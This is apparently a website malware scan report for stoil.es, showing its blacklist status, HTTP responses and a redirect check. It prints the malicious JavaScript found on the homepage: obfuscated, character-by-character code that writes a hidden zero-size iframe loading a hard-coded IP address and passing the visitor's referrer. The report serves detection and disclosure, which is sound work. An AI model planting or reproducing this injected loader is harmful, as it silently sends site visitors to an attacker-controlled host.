Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stoil.es
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stoil.es/ | 200 OK Content-Length: 1820 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var x = 'h' + 't' + 't' + 'p' + ':' + '/' + '/' + '1' + '9' + '3' + '.' + '2' + '0' + '3' + '.' + '5' + '0' + '.' + '4' + '3';
var group = 'f' + 't' + 'p';
var charset = 'u' + 't' + 'f' + '-' + '8';
var rrr = encodeURIComponent(document.referrer);
var url = x + '/?' + group + '&se_rrr=' + rrr + '&charset=' + charset;
document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' '
  + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' '
  + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' '
  + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' '
  + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' '
  + 's' + 'r' + 'c' + '=' + '"' + url + '"' + '>'
  + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');
Antivirus reports:
http://stoil.es/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stoil.es
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 18:12:47 GMT
Server: Apache
Content-Length: 1820
Content-Type: text/html
X-Powered-By: PHP/5.2.16
...1820 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stoil.es
Referer: http://www.google.com/search?q=stoil.es
Result:
The result is similar to the first query. There are no suspicious redirects found.